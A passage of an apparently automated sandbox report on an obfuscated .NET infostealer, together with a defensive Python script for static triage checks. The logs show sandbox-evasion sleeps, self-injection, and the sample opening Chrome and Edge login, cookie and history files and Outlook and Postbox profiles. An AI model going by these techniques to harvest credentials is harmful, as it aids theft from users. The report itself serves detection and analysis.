Hhb2ZC4YUjOmRhv7c7.cs: 'QfsqB07llS', 'p8rqQtulXN', 'lpdqOjIa6y', 'w0yqMR67VW', 'J7pqg6JeQu', 'RWeqXtc7m6', 'DqYEsar00IfXho5INC', 'BhPsCMJANpf4C0Y8tr', 'ajuqqUe22A', 'idCqNJb9uQ'
uQucWedtc7m6UiYPOo.cs: 'tvnFUiRwGd', 'RkfFw6wcnY', 'Jb7FlvuRbe', 'iETFB9d7fK', 'YrIFQiw8XX', 'H9nlPmIucc', 'DnklKTeWMK', 'bl9l1xak2B', 'gqklDcJTvq', 'XSxlrd8Jqj'
E7VWmfYfPvWACp7p6J.cs: 'wK8ljssXjt', 'RiylG0ScCe', 'TSPxSxXd2t', 'OVVxa5F1Oa', 'z1gxpuUUWc', 'MRIxk2oxaH', 'kkbx9a7Y29', 'PCwxtFYGHo', 'HntxbvqvYF', 'MeZxVJPHEl'
zo37rSQVkQ5Zi1XDwG.cs: 'jH6NU1CWAj', 'wTONCGh8gw', 'Y9INwcIEdD', 'u0mNxu2TAw', 'oAHNl5EXGI', 'fcNNFhEe20', 'FIeNBg6MJi', 'xCSNQJvrfo', 'm02NRuykp2', 'vMuNOSj35h'
b5oFPOf2vlQ1ZEjA8v.cs: 'y6JmoyuHl', 'igMI2eKYH', 'uC6TMVY3C', 'CpuGV1qSV', 'xsZsCYrtk', 'z21YYwgrv', 'WGT5CpgNNveMuwfRrZ', 'DK4NrwpojBfip71UpI', 'qO05bjOyn', 'eii8JfH3e'
VOuXCE97qsitDL1GgQ.cs: 'yoYBCU5Hk0', 't7VBxn38fU', 'EeyBFyc4mr', 'rGMFiwiE2F', 'yNAFzrQbqp', 'jJlByhD116', 'c32BqobNbP', 'RmBBfeS2bJ', 'U8MBNpRZyK', 'c32B4hCMSv'
b64V8t184eaYoo2HhK.cs: 'Qa0LgRFUMB', 'kAoLnAb7Il', 'a7xLLpTVKr', 'G5yLJtDuj1', 'cihL2Ujtde', 'XMjL031YE0', 'Dispose', 'eVR5CgGZv9', 'Ee85waoFjg', 'DV35xLCKuI'
LyLaCZip3tWf5ab9h4.cs: 'Hnv8xnJkFA', 'nKn8leLqE3', 'tap8FvyqHN', 'WwW8B3COgG', 'TLV8L0YcN3', 'Fom8QL1YRP', 'Next', 'Next', 'Next', 'NextBytes'
AnULCawIAmCoqBP8v9.cs: 'Dispose', 'uaYqroo2Hh', 'suxf3fk9m4', 'eJ7hQugY8e', 'VWKqiFOWBM', 'ab5qzObivJ', 'ProcessDialogKey', 'eErfyMj0lh', 'QosfqjVL5H', 'pupfftyLaC'
snwcIKZHHh0k4nThpr.cs: 'yrsgVHV0LB', 'IJDgWAXRU6', 'PxHgZ8p30r', 'BACgclYqU9', 'mAmg3Mw9L5', 'to7gSu06S4', 'YeIgaktcrh', 'whjgpeDm5M', 't3ugkCO7D7', 'PfLg92pj0q'
dQt9iNbukrodAWAhaT.cs: 'PtrBHOwqgF', 'YcdBvtuYFf', 'evZBma2gNQ', 'sIOBIg1s5T', 'cjrBjmq5Gm', 'y5yBTNHmAj', 'SsyBG44iaX', 'l6FB6Yp64h', 'rv7BsQk44q', 'A8NBYm15bZ'
pQZLLezc6UJDoHSEDY.cs: 'uQa8TXpHbG', 'kMv86L2yVU', 'omS8skbICL', 'LtS8ddA1md', 'jQy83Qqrb6', 'jlH8aZaCYk', 'ABc8pttQ9H', 'hnJ80brbda', 'WLW8HIlnFc', 'mhI8vtyiF6'
pGwGNUqqWm3APL9IIGA.cs: 'Kda8i1O4Xv', 'v2v8zvFmbf', 'cBJJylL4le', 'wMYJqxaLJF', 'R3dJfNKyLj', 'qToJNfAg9R', 'GpyJ4TXcSZ', 'vqZJUdYDiy', 'RhJJCe7GlN', 'o8VJwTMNQe'
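The timestamp, .text entropy, method-name entropy and invisible MainForm method name listed above are all static checks a triage script can reproduce. The following Python is an added example, not Joe Sandbox's code and not from the sample; it runs the four checks on values copied from this report (TimeDateStamp 0xAD89030B, the method names of class HYu8KTKNHIOYhAZOIS, the escaped MainForm method name) plus constructed byte strings and a constructed list of ordinary .NET names for the entropy comparison. The analysis date used as "now", the 1990 lower bound, the reading of each _XXXX in the rendered method name as one UTF-16 code unit, and the benign name list are assumptions; the sandbox's own thresholds are not published on this page.

```python
"""Static triage checks behind four findings in this report: an implausible
PE TimeDateStamp, a .text section with near-maximum entropy, .NET method
names that look random, and a method name made of invisible characters.
Added example, not Joe Sandbox's code; thresholds are the author's."""
import math
import unicodedata
from collections import Counter
from datetime import datetime, timezone

# Values copied from the report.
SAMPLE_TIMESTAMP = 0xAD89030B
REPORTED_TEXT_ENTROPY = 7.766159248335199
OBFUSCATED_NAMES = ['KYZnD835yU', 'oY4ni6CSDR', 'QZD5yRrXGg', 'Ogs5qoPurV',
                    'HLSnhEKEaA', 'NyrnWFDQOg', 'FgunEqxdBo', 'N94nZaE9KO',
                    'xVLnckD0oF', 'Hf3nuglNAF']
INVISIBLE_NAME = ("_200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D"
                  "_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C"
                  "_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C"
                  "_202B_202D_206B_200C_202E")

# Constructed for comparison: ordinary, hand-written .NET member names.
BENIGN_NAMES = ['ToString', 'Dispose', 'GetHashCode', 'Equals', 'Next', 'NextBytes']
# Assumed analysis date; the report does not state when it ran.
ANALYSIS_TIME = int(datetime(2025, 3, 10, tzinfo=timezone.utc).timestamp())
# Assumed lower bound: no toolchain that matters produced PE files before this.
EARLIEST_SANE_BUILD = int(datetime(1990, 1, 1, tzinfo=timezone.utc).timestamp())


def pe_timestamp_utc(ts: int) -> datetime:
    """IMAGE_FILE_HEADER.TimeDateStamp counts seconds since 1970-01-01 UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def timestamp_is_implausible(ts: int, reference_ts: int, slack_days: int = 1) -> bool:
    """True when the claimed build time is after the reference date (plus a
    little slack for clock skew) or before any plausible toolchain existed.
    Roslyn deterministic builds store a content hash in this field, so a hit
    is a reason to look closer, not proof of tampering."""
    return ts > reference_ts + slack_days * 86400 or ts < EARLIEST_SANE_BUILD


def shannon_entropy(data) -> float:
    """Bits per symbol over a bytes object or a string; a byte stream tops
    out at 8.0, which packed or encrypted sections approach."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


def name_entropy(names) -> float:
    """Entropy of all method names of one class concatenated: random-looking
    obfuscator output scores well above English identifiers."""
    return shannon_entropy("".join(names))


def decode_escaped_name(escaped: str) -> str:
    """Reverse the report's rendering of an unprintable identifier, taking
    each _XXXX as one UTF-16 code unit (assumption about the renderer)."""
    return "".join(chr(int(unit, 16)) for unit in escaped.split("_") if unit)


def is_invisible_identifier(name: str) -> bool:
    """True when every character is a Unicode format control (category Cf):
    zero-width joiners and bidi overrides that render as nothing at all."""
    return bool(name) and all(unicodedata.category(ch) == "Cf" for ch in name)


if __name__ == "__main__":
    when = pe_timestamp_utc(SAMPLE_TIMESTAMP)
    print("TimeDateStamp %s -> %s, implausible=%s" % (
        hex(SAMPLE_TIMESTAMP), when.isoformat(),
        timestamp_is_implausible(SAMPLE_TIMESTAMP, ANALYSIS_TIME)))
    print("reported .text entropy %.3f; uniform bytes give %.3f, constant bytes %.3f" % (
        REPORTED_TEXT_ENTROPY, shannon_entropy(bytes(range(256)) * 4),
        shannon_entropy(b"A" * 1024)))
    print("method-name entropy: obfuscated %.2f vs benign %.2f" % (
        name_entropy(OBFUSCATED_NAMES), name_entropy(BENIGN_NAMES)))
    decoded = decode_escaped_name(INVISIBLE_NAME)
    print("MainForm method name: %d characters, all invisible: %s" % (
        len(decoded), is_invisible_identifier(decoded)))
```

The entropy helper accepts both bytes and strings, so the same function serves the section check (where 7.77 of a possible 8 bits per byte is what packed code looks like) and the identifier check (where a class whose names score around 5.5 bits per character next to a benign list near 4 is what a renaming obfuscator leaves behind). Decoding the escaped method name shows why it is worth flagging separately: forty-odd characters, every one of them a format control that no decompiler pane will display.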
Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Process information set: NOOPENFILEERRORBOX (98 identical events; SetErrorMode(SEM_NOOPENFILEERRORBOX) suppresses the dialog Windows would otherwise show when a library load fails, which keeps a failed DLL load from alerting the user but is low-signal on its own)

                Malware Analysis System Evasion

                Source: Yara match, File source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: 3020000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: 3190000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: 5190000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: 9590000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: A590000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: A7A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: B7A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: C1A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: D1A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: E1A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: 10C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: 2AA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: 28E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 599875
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 599765
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 599656
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 599547
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 599437
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 599328
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 599219
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 599109
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 599000
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 598890
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 598781
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 598672
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 598562
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 598453
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 598344
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 598219
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 598109
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 597999
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 597880
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 597765
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 597643
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 597528
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 597414
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 597281
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 597172
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 597062
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 596953
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 596844
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 596734
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 596625
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 596515
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 596406
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 596297
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 596187
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 596078
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 595969
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 595856
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 595749
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 595640
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 595531
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 595422
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 595312
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 595202
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 595091
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 594984
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 594822
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 594701
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 594589
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Thread delayed: delay time: 594484
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Window / User API: threadDelayed 2146
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Window / User API: threadDelayed 7718
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 7044 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -24903104499507879s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -599875s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 6152 Thread sleep count: 2146 > 30
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 6152 Thread sleep count: 7718 > 30
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -599765s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -599656s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -599547s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -599437s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -599328s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -599219s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -599109s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -599000s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -598890s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -598781s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -598672s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -598562s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -598453s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -598344s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -598219s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -598109s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -597999s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -597880s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -597765s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -597643s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -597528s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -597414s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -597281s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -597172s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -597062s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -596953s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -596844s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -596734s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -596625s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -596515s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -596406s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -596297s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -596187s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -596078s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -595969s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -595856s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -595749s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -595640s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -595531s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -595422s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -595312s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -595202s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -595091s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -594984s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -594822s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -594701s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -594589s >= -30000s
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940 Thread sleep time: -594484s >= -30000s
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3335567715.0000000000CA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Code function: 1_2_06739668 LdrInitializeThunk, 1_2_06739668
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Memory written: C:\Users\user\Desktop\XFo9jVGyLQ.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Process created: C:\Users\user\Desktop\XFo9jVGyLQ.exe "C:\Users\user\Desktop\XFo9jVGyLQ.exe"
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Queries volume information: C:\Users\user\Desktop\XFo9jVGyLQ.exe VolumeInformation
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTR
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                Remote Access Functionality

                Source: Yara match, File source: 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; bracketed numbers are the counts shown next to a technique in the original matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection [111]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [31]; Process Injection [111]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [12]; Timestomp [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery [1]; Process Discovery [1]; Virtualization/Sandbox Evasion [31]; Application Window Discovery [1]; System Network Configuration Discovery [1]; System Information Discovery [13]; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Email Collection [1]; Archive Collected Data [11]; Data from Local System [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
